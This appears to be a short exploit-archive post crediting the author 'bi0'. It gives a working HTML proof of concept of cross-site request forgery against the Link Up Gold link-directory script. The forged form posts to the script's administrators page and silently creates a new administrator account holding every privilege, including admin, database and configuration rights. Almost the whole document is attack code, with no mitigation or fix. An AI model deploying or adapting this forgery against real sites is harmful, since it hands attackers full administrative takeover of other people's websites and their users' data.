______ __ ______
/\ == \ /\ \ /\ __ \
\ \ __< \ \ \ \ \ \/\ \
\ \_____\ \ \_\ \ \_____\
\/_____/ \/_/ \/_____/
01000010 01101001 01001111
[#]----------------------------------------------------------------[#]
#
# [+] Link Up Gold - [ CSRF ] Create Administrator Account
#
# // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
# [ Login ]
# http://localhost/[path]/administration/index.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|
<html>
<body>
<form action="http://[server]/[path]/administration/administrators.php" method="POST">
<input type="hidden" name="action" value="admin_created">
<!-- chose username -->
<input name="username" value="admintest" maxlength=15
<!-- chose password -->
<input name="password" value="admintest" maxlength=15>
<!-- chose email -->
<input name="email" value="admintest@lol.com" maxlength="255">
<!-- chose name -->
<input name="name" value="admintest" maxlength="255">
<input type="hidden" name="rights[]" value="links" CHECKED>
<input type="hidden" name="rights[]" value="all_links" CHECKED>
<input type="hidden" name="rights[]" value="categories_links" CHECKED>
<input type="hidden" name="rights[]" value="articles" CHECKED>
<input type="hidden" name="rights[]" value="all_articles" CHECKED>
<input type="hidden" name="rights[]" value="categories_articles" CHECKED>
<input type="hidden" name="rights[]" value="email_owners" CHECKED>
<input type="hidden" name="rights[]" value="blacklist" CHECKED>
<input type="hidden" name="rights[]" value="polls" CHECKED>
<input type="hidden" name="rights[]" value="users" CHECKED>
<input type="hidden" name="rights[]" value="email_users" CHECKED>
<input type="hidden" name="rights[]" value="newsletter" CHECKED>
<input type="hidden" name="rights[]" value="board" CHECKED>
<input type="hidden" name="rights[]" value="search_log" CHECKED>
<input type="hidden" name="rights[]" value="ads" CHECKED>
<input type="hidden" name="rights[]" value="adlinks" CHECKED>
<input type="hidden" name="rights[]" value="news" CHECKED>
<input type="hidden" name="rights[]" value="messages" CHECKED>
<input type="hidden" name="rights[]" value="templates" CHECKED>
<input type="hidden" name="rights[]" value="adv_prices_orders" CHECKED>
<input type="hidden" name="rights[]" value="admins" CHECKED>
<input type="hidden" name="rights[]" value="database_tools" CHECKED>
<input type="hidden" name="rights[]" value="configuration"CHECKED>
<input type="hidden" name="rights[]" value="reset_rebuild" CHECKED>
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]
#EOF